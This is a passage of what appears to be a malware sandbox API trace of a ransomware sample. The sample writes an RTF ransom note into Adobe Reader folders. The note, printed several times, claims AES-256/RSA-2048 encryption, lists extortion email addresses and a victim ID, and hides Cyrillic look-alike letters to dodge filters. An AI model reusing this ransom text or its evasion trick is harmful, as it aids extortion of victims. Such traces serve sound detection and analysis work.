f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.529] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.531] CloseHandle (hObject=0x1fc) returned 1 [0064.531] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\dan\\bg85_info.rtf")) returned 0xffffffff [0064.532] GetLastError () returned 0x2 [0064.532] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\dan\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0064.532] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.532] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 